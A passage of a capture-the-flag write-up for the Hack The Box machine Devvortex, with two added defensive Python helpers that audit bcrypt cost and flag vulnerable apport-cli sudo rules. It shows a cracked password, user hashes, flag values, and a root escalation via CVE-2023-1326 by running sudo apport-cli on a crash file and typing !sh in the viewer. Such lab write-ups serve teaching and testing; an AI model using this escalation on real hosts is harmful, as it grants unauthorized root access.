If no wordlist is specified, /usr/share/john/password.lst is used, but tequieromucho is not in it, so the run does not finish.
Using the obtained password, switch to the logan user with su and get user.txt.
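The "Cost 1 (iteration count) is 1024" line john prints comes straight from the `$2y$10$` prefix (2^10 rounds). The following added audit helper, which is not part of the writeup, parses the bcrypt strings from the sd4fg_users rows above and flags accounts whose work factor is below an assumed minimum cost of 12:

```python
import re

# Added example (not from the writeup): inspect bcrypt strings pulled from the
# Joomla users table and report their work factor, the same number john prints
# as "Cost 1 (iteration count)". Format: $2<v>$<cost>$<22-char salt><31-char hash>
BCRYPT_RE = re.compile(
    r"^\$(?P<variant>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$"
)

def parse_bcrypt(hash_text):
    """Split a bcrypt modular-crypt string into fields; cost is log2 of the iteration count."""
    m = BCRYPT_RE.match(hash_text)
    if not m:
        raise ValueError("not a bcrypt hash: %r" % hash_text)
    cost = int(m.group("cost"))
    return {
        "variant": m.group("variant"),
        "cost": cost,
        "iterations": 2 ** cost,
        "salt": m.group("salt"),
        "digest": m.group("digest"),
    }

def audit_hashes(rows, min_cost=12):
    """rows: (username, hash). Returns users whose cost is below min_cost (assumed policy)."""
    weak = []
    for username, hash_text in rows:
        try:
            info = parse_bcrypt(hash_text)
        except ValueError:
            weak.append((username, "unrecognised format"))
            continue
        if info["cost"] < min_cost:
            weak.append((username, "cost %d (%d iterations)" % (info["cost"], info["iterations"])))
    return weak

# Hashes copied from the sd4fg_users rows shown above
USER_ROWS = [
    ("lewis", "$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u"),
    ("logan", "$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12"),
]

if __name__ == "__main__":
    for user, reason in audit_hashes(USER_ROWS):
        print(user, reason)
```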
www-data@devvortex:~/dev.devvortex.htb/administrator$ su logan
Password:
logan@devvortex:~$ cat user.txt
6c6da8961f72024810914edff8cc0d4e
Logging in via SSH also works.
Running sudo -l showed that something called apport-cli can be run with root privileges.
logan@devvortex:~$ sudo -l
[sudo] password for logan:
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
apport-cli is apparently a tool for sending reports when a crash occurs: https://valinux.hatenablog.com/entry/20210721
Looking at what apport is in the first place, it provides a mechanism that collects information when an installed program crashes and automatically sends a report. It seems to be mainly used by Ubuntu's fault-analysis team as a clue for analysis.
logan@devvortex:/var/www/dev.devvortex.htb/administrator$ apport-cli --help
Usage: apport-cli [options] [symptom|pid|package|program path|.apport/.crash file]
Options:
-h, --help show this help message and exit
-f, --file-bug Start in bug filing mode. Requires --package and an
optional --pid, or just a --pid. If neither is given,
display a list of known symptoms. (Implied if a single
argument is given.)
-w, --window Click a window as a target for filing a problem
report.
-u UPDATE_REPORT, --update-bug=UPDATE_REPORT
Start in bug updating mode. Can take an optional
--package.
-s SYMPTOM, --symptom=SYMPTOM
File a bug report about a symptom. (Implied if symptom
name is given as only argument.)
-p PACKAGE, --package=PACKAGE
Specify package name in --file-bug mode. This is
optional if a --pid is specified. (Implied if package
name is given as only argument.)
-P PID, --pid=PID Specify a running program in --file-bug mode. If this
is specified, the bug report will contain more
information. (Implied if pid is given as only
argument.)
--hanging The provided pid is a hanging application.
-c PATH, --crash-file=PATH
Report the crash from given .apport or .crash file
instead of the pending ones in /var/crash. (Implied if
file is given as only argument.)
--save=PATH In bug filing mode, save the collected information
into a file instead of reporting it. This file can
then be reported later on from a different machine.
--tag=TAG Add an extra tag to the report. Can be specified
multiple times.
-v, --version Print the Apport version number.
logan@devvortex:/var/www/dev.devvortex.htb/administrator$ apport-cli --version
2.20.11
The installed version is 2.20.11.
Searching exploit-db for apport turned up https://www.exploit-db.com/exploits/43971, but the version does not match.
https://github.com/liumuqing/CVE-2021-3899_PoC appears to require editing /etc/sudoers, but there is no write permission, so that is not possible.
logan@devvortex:/var/www/dev.devvortex.htb/administrator$ ls -l /etc/sudoers
-r--r----- 1 root root 794 Sep 27 2023 /etc/sudoers
Found CVE-2023-1326. Versions 2.26.0 and below are affected: https://scan.netsecurity.ne.jp/article/2024/02/14/50590.html
The vulnerability lies in apport-cli's function for viewing analysis results. In the vulnerable apport-cli, the viewer for analysis results implements syntax that executes OS commands, so when it is run via a command such as sudo, instructing it to execute bash or similar allows interactive operation with administrator privileges. apport-cli addresses the vulnerability by changing the implementation so that, when it is run via sudo or pkexec and the same operation is performed, it runs with the caller's privileges.
A vulnerability similar to CVE-2023-26604, which I worked on in https://github.com/roaris/ctf-log/issues/37#issuecomment-2095737774
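The two conditions that matter here are a sudo rule granting apport-cli as root and an Apport build that predates the fix. The following added audit helper, which is not part of the writeup, parses `sudo -l` output for such a rule and compares the installed version against the affected range the page states (2.26.0 and below, so anything before 2.26.1 is assumed affected):

```python
import re

# Added audit helper (not from the writeup): flags a sudo rule that lets a user run
# apport-cli as root on a host whose Apport build is in the affected range for
# CVE-2023-1326 (the page states versions 2.26.0 and below; assumed fixed from 2.26.1).
APPORT_FIXED_VERSION = (2, 26, 1)

# A sudo -l rule line, e.g. "(ALL : ALL) NOPASSWD: /usr/bin/apport-cli"
SUDO_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_version(text):
    """'2.20.11' -> (2, 20, 11); tuples compare element-wise."""
    return tuple(int(part) for part in text.strip().split("."))

def apport_cli_affected(version_text):
    """True when the installed Apport predates the assumed CVE-2023-1326 fix version."""
    return parse_version(version_text) < APPORT_FIXED_VERSION

def parse_sudo_rules(sudo_l_output):
    """Return (runas, tags, [commands]) for each rule after 'may run the following commands'."""
    rules, in_rules = [], False
    for line in sudo_l_output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = SUDO_RULE_RE.match(line) if in_rules else None
        if m:
            cmds = [c.strip() for c in m.group("cmds").split(",")]
            rules.append((m.group("runas").strip(), m.group("tags").strip(), cmds))
    return rules

def apport_root_rules(sudo_l_output):
    """Commands from rules whose run-as user is root/ALL and whose binary is apport-cli."""
    hits = []
    for runas, _tags, cmds in parse_sudo_rules(sudo_l_output):
        runas_user = runas.split(":")[0].strip()
        if runas_user not in ("ALL", "root"):
            continue
        hits.extend(c for c in cmds if c.split()[0].rsplit("/", 1)[-1] == "apport-cli")
    return hits

# sudo -l output copied from the writeup above
SUDO_L_SAMPLE = """\
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
"""

def audit(sudo_l_output, apport_version):
    """Risk is present only when the sudo rule and an affected version coincide."""
    rules = apport_root_rules(sudo_l_output)
    affected = apport_cli_affected(apport_version)
    return {"rules": rules, "affected_version": affected, "at_risk": bool(rules) and affected}

if __name__ == "__main__":
    print(audit(SUDO_L_SAMPLE, "2.20.11"))
```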
https://valinux.hatenablog.com/entry/20210721
When a crash occurs, a core file is placed in the current directory, and a collected-information file including the core file (hereafter, the report) is placed in /var/crash.
There was a report in /var/crash.
logan@devvortex:/var/www/dev.devvortex.htb/administrator$ ls /var/crash
_usr_bin_apport-cli.1000.crash
Run sudo apport-cli -c /var/crash/_usr_bin_apport-cli.1000.crash
What would you like to do? Your options are:
S: Send report (36.2 KB)
V: View report
K: Keep report file for sending later or copying to somewhere else
I: Cancel and ignore future crashes of this program version
C: Cancel
Please choose (S/V/K/I/C):
When asked this, choose V. After a while a command prompt appears; typing !sh there yields a root shell as shown below.
# bash -i
root@devvortex:/var/www/dev.devvortex.htb/administrator# cd /root
root@devvortex:~# ls
root.txt
root@devvortex:~#
root@devvortex:~# cat root.txt
deb5faa894f0d9801842e81e3dad16ff
Solution summary
https://app.hackthebox.com/machines/Devvortex